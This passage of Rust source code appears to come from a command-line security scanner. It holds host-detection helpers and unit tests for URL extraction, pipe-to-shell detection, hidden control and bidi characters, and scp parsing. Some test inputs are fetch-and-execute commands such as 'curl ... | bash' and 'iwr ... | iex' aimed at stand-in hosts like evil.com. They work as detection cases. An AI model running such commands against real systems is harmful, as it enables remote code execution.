1380 let host_part = s.split('/').next().unwrap_or(s);
1382 if !host_part.contains('.') || host_part.contains(' ') {
1383 return false;
1384 }
1385 let host_lower = host_part.to_lowercase();
1391 let has_meaningful_path = s.find('/').is_some_and(|idx| {
1392 let after_slash = &s[idx + 1..];
1393 !after_slash.is_empty() && after_slash != "/"
1394 });
1395 if !has_meaningful_path {
1396 let file_exts = [
1397 ".sh",
1398 ".py",
1399 ".rb",
1400 ".js",
1401 ".ts",
1402 ".go",
1403 ".rs",
1404 ".c",
1405 ".h",
1406 ".txt",
1407 ".md",
1408 ".json",
1409 ".yaml",
1410 ".yml",
1411 ".xml",
1412 ".html",
1413 ".css",
1414 ".tar.gz",
1415 ".tar.bz2",
1416 ".tar.xz",
1417 ".tgz",
1418 ".zip",
1419 ".gz",
1420 ".bz2",
1421 ".rpm",
1422 ".deb",
1423 ".pkg",
1424 ".dmg",
1425 ".exe",
1426 ".msi",
1427 ".dll",
1428 ".so",
1429 ".log",
1430 ".conf",
1431 ".cfg",
1432 ".ini",
1433 ".toml",
1434 ".png",
1435 ".jpg",
1436 ".jpeg",
1437 ".gif",
1438 ".bmp",
1439 ".ico",
1440 ".tiff",
1441 ".tif",
1442 ".pdf",
1443 ".csv",
1444 ".mp3",
1445 ".mp4",
1446 ".wav",
1447 ".avi",
1448 ".mkv",
1449 ".flac",
1450 ".ogg",
1451 ".webm",
1452 ".ttf",
1453 ".otf",
1454 ".woff",
1455 ".woff2",
1456 ".docx",
1457 ".xlsx",
1458 ".pptx",
1459 ".sqlite",
1460 ".lock",
1461 ".example",
1462 ".local",
1463 ".bak",
1464 ".tmp",
1465 ".swp",
1466 ".orig",
1467 ".patch",
1468 ".diff",
1469 ".map",
1470 ".env",
1471 ".sample",
1472 ".dist",
1473 ".editorconfig",
1474 ];
1475 if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
1476 return false;
1477 }
1478 }
1479 let labels: Vec<&str> = host_part.split('.').collect();
1481 if labels.len() < 2 {
1482 return false;
1483 }
1484 let tld = labels.last().unwrap();
1486 tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
1487}
1488
1489fn extract_host_from_schemeless(s: &str) -> String {
1490 s.split('/').next().unwrap_or(s).to_string()
1491}
1492
1493fn extract_path_from_schemeless(s: &str) -> String {
1494 if let Some(idx) = s.find('/') {
1495 s[idx..].to_string()
1496 } else {
1497 String::new()
1498 }
1499}
1500
1501#[cfg(test)]
1502mod tests {
1503 use super::*;
1504
1505 #[test]
1506 fn test_tier1_exec_matches_url() {
1507 assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
1508 }
1509
1510 #[test]
1511 fn test_tier1_exec_no_match_simple() {
1512 assert!(!tier1_scan("ls -la", ScanContext::Exec));
1513 }
1514
1515 #[test]
1516 fn test_tier1_exec_no_match_echo() {
1517 assert!(!tier1_scan("echo hello world", ScanContext::Exec));
1518 }
1519
1520 #[test]
1521 fn test_tier1_exec_matches_pipe_bash() {
1522 assert!(tier1_scan("something | bash", ScanContext::Exec));
1523 }
1524
1525 #[test]
1526 fn test_tier1_exec_matches_pipe_sudo_bash() {
1527 assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
1528 }
1529
1530 #[test]
1531 fn test_tier1_exec_matches_pipe_env_bash() {
1532 assert!(tier1_scan("something | env bash", ScanContext::Exec));
1533 }
1534
1535 #[test]
1536 fn test_tier1_exec_matches_pipe_bin_bash() {
1537 assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
1538 }
1539
1540 #[test]
1541 fn test_tier1_exec_matches_git_scp() {
1542 assert!(tier1_scan(
1543 "git clone git@github.com:user/repo",
1544 ScanContext::Exec
1545 ));
1546 }
1547
1548 #[test]
1549 fn test_tier1_exec_matches_punycode() {
1550 assert!(tier1_scan(
1551 "curl https://xn--example-cua.com",
1552 ScanContext::Exec
1553 ));
1554 }
1555
1556 #[test]
1557 fn test_tier1_exec_matches_docker() {
1558 assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
1559 }
1560
1561 #[test]
1562 fn test_tier1_exec_matches_iwr() {
1563 assert!(tier1_scan(
1564 "iwr https://evil.com/script.ps1",
1565 ScanContext::Exec
1566 ));
1567 }
1568
1569 #[test]
1570 fn test_tier1_exec_matches_curl() {
1571 assert!(tier1_scan(
1572 "curl https://example.com/install.sh",
1573 ScanContext::Exec
1574 ));
1575 }
1576
1577 #[test]
1578 fn test_tier1_exec_matches_lookalike_tld() {
1579 assert!(tier1_scan("open file.zip", ScanContext::Exec));
1580 }
1581
1582 #[test]
1583 fn test_tier1_exec_matches_shortener() {
1584 assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
1585 }
1586
1587 #[test]
1588 fn test_tier1_paste_matches_non_ascii() {
1589 assert!(tier1_scan("café", ScanContext::Paste));
1590 }
1591
1592 #[test]
1593 fn test_tier1_paste_exec_patterns_also_match() {
1594 assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
1595 }
1596
1597 #[test]
1598 fn test_tier1_exec_no_non_ascii() {
1599 assert!(!tier1_scan("echo café", ScanContext::Exec));
1601 }
1602
1603 #[test]
1604 fn test_byte_scan_ansi() {
1605 let input = b"hello \x1b[31mred\x1b[0m world";
1606 let result = scan_bytes(input);
1607 assert!(result.has_ansi_escapes);
1608 }
1609
1610 #[test]
1611 fn test_byte_scan_control_chars() {
1612 let input = b"hello\rworld";
1613 let result = scan_bytes(input);
1614 assert!(result.has_control_chars);
1615 }
1616
1617 #[test]
1618 fn test_byte_scan_bidi() {
1619 let input = "hello\u{202E}dlrow".as_bytes();
1620 let result = scan_bytes(input);
1621 assert!(result.has_bidi_controls);
1622 }
1623
1624 #[test]
1625 fn test_byte_scan_zero_width() {
1626 let input = "hel\u{200B}lo".as_bytes();
1627 let result = scan_bytes(input);
1628 assert!(result.has_zero_width);
1629 }
1630
1631 #[test]
1632 fn test_byte_scan_clean() {
1633 let input = b"hello world\n";
1634 let result = scan_bytes(input);
1635 assert!(!result.has_ansi_escapes);
1636 assert!(!result.has_control_chars);
1637 assert!(!result.has_bidi_controls);
1638 assert!(!result.has_zero_width);
1639 }
1640
1641 #[test]
1642 fn test_extract_urls_basic() {
1643 let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1644 assert_eq!(urls.len(), 1);
1645 assert_eq!(urls[0].raw, "https://example.com/install.sh");
1646 }
1647
1648 #[test]
1649 fn test_extract_urls_from_leading_env_assignment() {
1650 let urls = extract_urls(
1651 "PAYLOAD_URL=https://example.com/install.sh curl ok",
1652 ShellType::Posix,
1653 );
1654 assert!(
1655 urls.iter()
1656 .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
1657 "leading env assignment URL should be extracted in sink context"
1658 );
1659 }
1660
1661 #[test]
1662 fn test_extract_urls_from_quoted_leading_env_assignment() {
1663 let urls = extract_urls(
1664 "PAYLOAD_URL='https://example.com/install.sh' curl ok",
1665 ShellType::Posix,
1666 );
1667 assert!(
1668 urls.iter()
1669 .any(|u| u.raw == "https://example.com/install.sh"),
1670 "quoted leading env assignment URL should be extracted"
1671 );
1672 }
1673
1674 #[test]
1675 fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
1676 let urls = extract_urls(
1677 "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
1678 ShellType::Posix,
1679 );
1680 assert!(
1681 !urls.iter().any(|u| u.raw == "http://proxy:8080"),
1682 "proxy configuration URLs should not be treated as destinations"
1683 );
1684 }
1685
1686 #[test]
1687 fn test_extract_urls_pipe() {
1688 let urls = extract_urls(
1689 "curl https://example.com/install.sh | bash",
1690 ShellType::Posix,
1691 );
1692 assert!(!urls.is_empty());
1693 assert!(urls[0].in_sink_context);
1694 }
1695
1696 #[test]
1697 fn test_extract_urls_scp() {
1698 let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1699 assert!(!urls.is_empty());
1700 assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1701 }
1702
1703 #[test]
1704 fn test_extract_docker_ref() {
1705 let urls = extract_urls("docker pull nginx", ShellType::Posix);
1706 let docker_urls: Vec<_> = urls
1707 .iter()
1708 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1709 .collect();
1710 assert_eq!(docker_urls.len(), 1);
1711 }
1712
1713 #[test]
1714 fn test_extract_powershell_iwr() {
1715 let urls = extract_urls(
1716 "iwr https://example.com/script.ps1 | iex",
1717 ShellType::PowerShell,
1718 );
1719 assert!(!urls.is_empty());
1720 }
1721
1722 #[test]
1723 fn test_wrapper_preserves_sink_context() {
1724 let urls = extract_urls(
1725 "env --ignore-environment curl http://example.com",
1726 ShellType::Posix,
1727 );
1728 assert!(
1729 urls.iter()
1730 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1731 "wrapped sink commands should keep sink context"
1732 );
1733 }
1734
1735 #[test]
1736 fn test_env_wrapper_preserves_tirith_run_sink_context() {
1737 let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
1738 assert!(
1739 urls.iter()
1740 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1741 "env wrapper should preserve tirith run sink context"
1742 );
1743 }
1744
1745 #[test]
1746 fn test_command_wrapper_preserves_tirith_run_sink_context() {
1747 let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
1748 assert!(
1749 urls.iter()
1750 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1751 "command wrapper should preserve tirith run sink context"
1752 );
1753 }
1754
1755 #[test]
1756 fn test_time_wrapper_preserves_tirith_run_sink_context() {
1757 let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
1758 assert!(
1759 urls.iter()
1760 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1761 "time wrapper should preserve tirith run sink context"
1762 );
1763 }
1764
1765 #[test]
1766 fn test_strip_quotes_single_char() {
1767 assert_eq!(strip_quotes("\""), "\"");
1768 assert_eq!(strip_quotes("'"), "'");
1769 }
1770
1771 #[test]
1772 fn test_strip_quotes_empty() {
1773 assert_eq!(strip_quotes(""), "");
1774 }
1775
1776 #[test]
1777 fn test_scan_bytes_bel_vt_del() {
1778 let input = b"hello\x07world";
1780 let result = scan_bytes(input);
1781 assert!(result.has_control_chars);
1782
1783 let input = b"hello\x0Bworld";
1785 let result = scan_bytes(input);
1786 assert!(result.has_control_chars);
1787
1788 let input = b"hello\x0Cworld";
1790 let result = scan_bytes(input);
1791 assert!(result.has_control_chars);
1792
1793 let input = b"hello\x7Fworld";
1795 let result = scan_bytes(input);
1796 assert!(result.has_control_chars);
1797 }
1798
1799 #[test]
1800 fn test_scan_bytes_osc_apc_dcs() {
1801 let input = b"hello\x1b]0;title\x07world";
1803 let result = scan_bytes(input);
1804 assert!(result.has_ansi_escapes);
1805
1806 let input = b"hello\x1b_dataworld";
1808 let result = scan_bytes(input);
1809 assert!(result.has_ansi_escapes);
1810
1811 let input = b"hello\x1bPdataworld";
1813 let result = scan_bytes(input);
1814 assert!(result.has_ansi_escapes);
1815 }
1816
1817 #[test]
1818 fn test_schemeless_long_tld() {
1819 assert!(looks_like_schemeless_host("example.academy"));
1820 assert!(looks_like_schemeless_host("example.photography"));
1821 }
1822
1823 #[test]
1824 fn test_segment_index_correct() {
1825 let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1826 for url in &urls {
1828 assert!(url.segment_index <= 1);
1830 }
1831 }
1832
1833 #[test]
1834 fn test_docker_build_context_not_image() {
1835 let urls = extract_urls("docker build .", ShellType::Posix);
1836 let docker_urls: Vec<_> = urls
1837 .iter()
1838 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1839 .collect();
1840 assert_eq!(
1841 docker_urls.len(),
1842 0,
1843 "build context '.' should not be treated as image"
1844 );
1845 }
1846
1847 #[test]
1848 fn test_docker_image_subcmd() {
1849 let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1850 let docker_urls: Vec<_> = urls
1851 .iter()
1852 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1853 .collect();
1854 assert_eq!(docker_urls.len(), 1);
1855 }
1856
1857 #[test]
1858 fn test_docker_run_image_after_double_dash() {
1859 let urls = extract_urls(
1860 "docker run --rm -- evil.registry/ns/img:1",
1861 ShellType::Posix,
1862 );
1863 let docker_urls: Vec<_> = urls
1864 .iter()
1865 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1866 .collect();
1867 assert_eq!(docker_urls.len(), 1);
1868 assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
1869 }
1870
1871 #[test]
1874 fn test_tier1_module_boundary_enforcement() {
1875 let ids = tier1_generated::EXTRACTOR_IDS;
1876 assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1877 let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1878 let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1879 assert!(exec_count > 0, "Must have exec fragments");
1880 assert!(
1881 paste_count >= exec_count,
1882 "Paste fragments must be superset of exec fragments"
1883 );
1884 Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1885 .expect("Generated exec pattern must be valid regex");
1886 Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1887 .expect("Generated paste pattern must be valid regex");
1888 }
1889
1890 #[test]
1891 fn test_scan_bytes_trailing_cr_not_flagged() {
1892 let result = scan_bytes(b"/path\r");
1893 assert!(
1894 !result.has_control_chars,
1895 "trailing \\r should not be flagged"
1896 );
1897 }
1898
1899 #[test]
1900 fn test_scan_bytes_trailing_crlf_not_flagged() {
1901 let result = scan_bytes(b"/path\r\n");
1902 assert!(
1903 !result.has_control_chars,
1904 "trailing \\r\\n should not be flagged"
1905 );
1906 }
1907
1908 #[test]
1909 fn test_scan_bytes_windows_multiline_not_flagged() {
1910 let result = scan_bytes(b"line1\r\nline2\r\n");
1911 assert!(
1912 !result.has_control_chars,
1913 "Windows \\r\\n line endings should not be flagged"
1914 );
1915 }
1916
1917 #[test]
1918 fn test_scan_bytes_embedded_cr_still_flagged() {
1919 let result = scan_bytes(b"safe\rmalicious");
1920 assert!(
1921 result.has_control_chars,
1922 "embedded \\r before non-\\n should be flagged"
1923 );
1924 }
1925
1926 #[test]
1927 fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1928 let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1929 assert!(
1930 result.has_control_chars,
1931 "attack \\r mixed with \\r\\n should be flagged"
1932 );
1933 }
1934
1935 #[test]
1936 fn test_scan_bytes_only_cr() {
1937 let result = scan_bytes(b"\r");
1938 assert!(
1939 !result.has_control_chars,
1940 "lone trailing \\r should not be flagged"
1941 );
1942 }
1943
1944 #[test]
1945 fn test_schemeless_skip_curl_output_flag() {
1946 let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1949 let schemeless: Vec<_> = urls
1950 .iter()
1951 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1952 .collect();
1953 assert!(
1954 schemeless.is_empty(),
1955 "lenna.png should not be detected as schemeless URL"
1956 );
1957 }
1958
1959 #[test]
1960 fn test_schemeless_skip_curl_output_combined() {
1961 let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1962 let schemeless: Vec<_> = urls
1963 .iter()
1964 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1965 .collect();
1966 assert!(
1967 schemeless.is_empty(),
1968 "-olenna.png should not be detected as schemeless URL"
1969 );
1970 }
1971
1972 #[test]
1973 fn test_schemeless_skip_wget_output_flag() {
1974 let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1975 let schemeless: Vec<_> = urls
1976 .iter()
1977 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1978 .collect();
1979 assert!(
1980 schemeless.is_empty(),
1981 "output.html should not be detected as schemeless URL"
1982 );
1983 }
1984
1985 #[test]
1986 fn test_schemeless_skip_wget_combined() {
1987 let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1988 let schemeless: Vec<_> = urls
1989 .iter()
1990 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1991 .collect();
1992 assert!(
1993 schemeless.is_empty(),
1994 "-Ooutput.html should not be detected as schemeless URL"
1995 );
1996 }
1997
1998 #[test]
1999 fn test_schemeless_real_domain_still_detected() {
2000 let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
2001 let schemeless: Vec<_> = urls
2002 .iter()
2003 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2004 .collect();
2005 assert!(
2006 !schemeless.is_empty(),
2007 "evil.com/payload should be detected as schemeless URL"
2008 );
2009 }
2010
2011 #[test]
2012 fn test_schemeless_user_at_host_detected_in_sink_context() {
2013 let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
2014 let schemeless: Vec<_> = urls
2015 .iter()
2016 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2017 .collect();
2018 assert_eq!(schemeless.len(), 1);
2019 assert_eq!(schemeless[0].raw, "user@bit.ly");
2020 }
2021
2022 #[test]
2023 fn test_scp_user_at_host_not_treated_as_schemeless_url() {
2024 let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
2025 let schemeless: Vec<_> = urls
2026 .iter()
2027 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2028 .collect();
2029 assert!(schemeless.is_empty());
2030 }
2031
2032 fn scp_has_schemeless(cmd: &str, shell: ShellType) -> bool {
2033 extract_urls(cmd, shell)
2034 .iter()
2035 .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2036 }
2037
2038 #[test]
2039 fn test_scp_plain_host_path_not_schemeless() {
2040 assert!(!scp_has_schemeless(
2042 "scp test.asdf testhost:/home/user/",
2043 ShellType::Posix
2044 ));
2045 }
2046
2047 #[test]
2048 fn test_scp_plain_host_relative_path_not_schemeless() {
2049 assert!(!scp_has_schemeless(
2050 "scp file.txt host:dir/",
2051 ShellType::Posix
2052 ));
2053 }
2054
2055 #[test]
2056 fn test_rsync_plain_host_path_not_schemeless() {
2057 assert!(!scp_has_schemeless(
2058 "rsync -av src host:/dest/",
2059 ShellType::Posix
2060 ));
2061 }
2062
2063 #[test]
2064 fn test_scp_one_letter_alias_posix_accepted() {
2065 assert!(!scp_has_schemeless("scp file x:/tmp/", ShellType::Posix));
2068 }
2069
2070 #[test]
2071 fn test_scp_windows_backslash_always_rejected() {
2072 assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Posix).is_none());
2074 assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::PowerShell).is_none());
2075 assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Cmd).is_none());
2076 assert!(parse_scp_remote_spec("D:\\backup", ShellType::Posix).is_none());
2077 }
2078
2079 #[test]
2080 fn test_scp_windows_forward_slash_shell_scoped() {
2081 assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::PowerShell).is_none());
2084 assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Cmd).is_none());
2085 assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Posix).is_some());
2086 assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Fish).is_some());
2087 }
2088
2089 #[test]
2090 fn test_scp_windows_ambiguous_drive_letter_accepted() {
2091 for shell in [
2095 ShellType::Posix,
2096 ShellType::Fish,
2097 ShellType::PowerShell,
2098 ShellType::Cmd,
2099 ] {
2100 assert!(
2101 parse_scp_remote_spec("C:foo", shell).is_some(),
2102 "C:foo should parse as remote in shell {shell:?}"
2103 );
2104 assert!(
2105 parse_scp_remote_spec("D:backup/x.txt", shell).is_some(),
2106 "D:backup/x.txt should parse as remote in shell {shell:?}"
2107 );
2108 }
2109 }
2110
2111 #[test]
2112 fn test_scp_rejects_url_scheme() {
2113 assert!(parse_scp_remote_spec("http://evil.com/a.sh", ShellType::Posix).is_none());
2114 assert!(parse_scp_remote_spec("https://a.b/c", ShellType::Posix).is_none());
2115 }
2116
2117 #[test]
2118 fn test_scp_rejects_flag_and_absolute_local() {
2119 assert!(parse_scp_remote_spec("-P", ShellType::Posix).is_none());
2120 assert!(parse_scp_remote_spec("--port=22", ShellType::Posix).is_none());
2121 assert!(parse_scp_remote_spec("/tmp:weird", ShellType::Posix).is_none());
2123 }
2124
2125 #[test]
2126 fn test_scp_accepts_user_at_host_forms() {
2127 assert!(parse_scp_remote_spec("user@server.com:file.txt", ShellType::Posix).is_some());
2129 assert!(parse_scp_remote_spec("user@host:/path", ShellType::Posix).is_some());
2130 }
2131
2132 #[test]
2133 fn test_scp_rejects_missing_parts() {
2134 assert!(parse_scp_remote_spec("", ShellType::Posix).is_none());
2135 assert!(parse_scp_remote_spec(":path", ShellType::Posix).is_none()); assert!(parse_scp_remote_spec("@host:path", ShellType::Posix).is_none()); assert!(parse_scp_remote_spec("user@:path", ShellType::Posix).is_none());
2138 }
2140
2141 #[test]
2142 fn test_scp_rejects_host_with_slash() {
2143 assert!(parse_scp_remote_spec("foo/bar:baz", ShellType::Posix).is_none());
2145 }
2146
2147 #[test]
2148 fn test_parse_scp_remote_spec_fields_populated() {
2149 let spec = parse_scp_remote_spec("user@server.com:/path", ShellType::Posix).unwrap();
2153 assert_eq!(spec.user.as_deref(), Some("user"));
2154 assert_eq!(spec.host, "server.com");
2155 assert_eq!(spec.path, "/path");
2156
2157 let spec = parse_scp_remote_spec("host:/dest/", ShellType::Posix).unwrap();
2158 assert_eq!(spec.user, None);
2159 assert_eq!(spec.host, "host");
2160 assert_eq!(spec.path, "/dest/");
2161 }
2162
2163 #[test]
2164 fn test_schemeless_png_no_slash_is_file() {
2165 assert!(!looks_like_schemeless_host("lenna.png"));
2166 }
2167
2168 #[test]
2169 fn test_schemeless_tld_overlap_with_path_is_domain() {
2170 assert!(looks_like_schemeless_host("evil.zip/payload"));
2173 assert!(looks_like_schemeless_host("evil.sh/payload"));
2174 }
2175
2176 #[test]
2177 fn test_schemeless_tld_overlap_without_path_is_file() {
2178 assert!(!looks_like_schemeless_host("lenna.zip"));
2180 assert!(!looks_like_schemeless_host("script.sh"));
2181 }
2182
2183 #[test]
2184 fn test_schemeless_tld_overlap_sink_context_detected() {
2185 let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
2187 let schemeless: Vec<_> = urls
2188 .iter()
2189 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2190 .collect();
2191 assert!(
2192 !schemeless.is_empty(),
2193 "evil.zip/payload should be detected as schemeless URL in sink context"
2194 );
2195 }
2196}